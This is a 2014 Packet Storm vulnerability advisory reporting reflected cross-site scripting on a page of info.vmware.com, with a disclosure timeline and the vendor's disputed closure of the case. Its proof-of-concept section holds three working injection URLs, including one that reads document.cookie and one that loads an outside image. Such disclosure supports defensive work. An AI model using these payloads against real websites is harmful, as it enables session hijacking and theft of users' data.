info.vmware.com Cross Site Scripting

2014-05-28T00:00:00
ID PACKETSTORM:126839
Type packetstorm
Reporter Robert Garcia
Modified 2014-05-28T00:00:00

Description

                                        
                                            `  
Advisory: info.vmware.com – Cross-Site Script Vulnerability (XSS) Advisory  
ID: VMware Support Request 14479234605  
Author: Roberto Garcia  
Affected Software: Successfully tested on info.vmware.com Vendor URL:  
htt://info.vmware.com Vendor Status: informed  
  
  
==========================  
Vulnerability Description  
==========================  
  
The website "info.vmware.com" is prone to a XSS vulnerability.  
  
This vulnerability involves the ability to inject arbitrary and unauthorized  
javascript code. A malicious script inserted into a page in this manner can  
hijack the user’s session, submit unauthorized transactions as the user,  
steal confidential information, or simply deface the page.  
  
  
==========================  
PoC-Exploit  
==========================  
  
http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3Cimg%20src=%  
22http://goo.gl/vxAvX3%22%3E  
  
http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3CBODY%20ONLO  
AD=alert%28%22XSSby@1GbDeInfo%22%29%3E  
  
http://info.vmware.com/content/26338_nsx_apj_cities?src=%E2%80%9C%3E%3Cscrip  
t%3Ealert%28document.cookie%29%3C/script%3E  
  
PoC video is available at  
https://mega.co.nz/#F!78QXhLJJ!jtHAxJWjsJZlEE0gnSXeFw  
  
  
==========================  
Solution  
==========================  
  
None  
  
  
==========================  
Disclosure Timeline  
==========================  
  
- May 2014. I enrolled in an online course. They sent me an email  
confirmation to see more information. I found a XSS in the URL where vmware  
had the additional info.  
- Report vuln May 20, 2014 via email to desktop-services@vmware.com  
- Asked by email to send a POC. I sent a video with the POC.  
- May 21, 2014. Asked by email to send the original email.  
- May 23, 2014. Replied by email that the original address  
(vmwareforum@delegate.com) does not belong to them, then vmware.com is not  
affected. I said them that the vuln was about info.vmware.com, it was not  
the email address.  
- Asked by email to go ahead and close this case on my behalf.  
- Closed as fixed, still vulnerable.  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Roberto Garcia  
  
  
  
  
Best regards.  
  
Roberto Garcia Amoriz  
Linkedin: Roberto Garcia  
Web: http://www.1gbdeinformacion.com  
  
  
  
  
  
`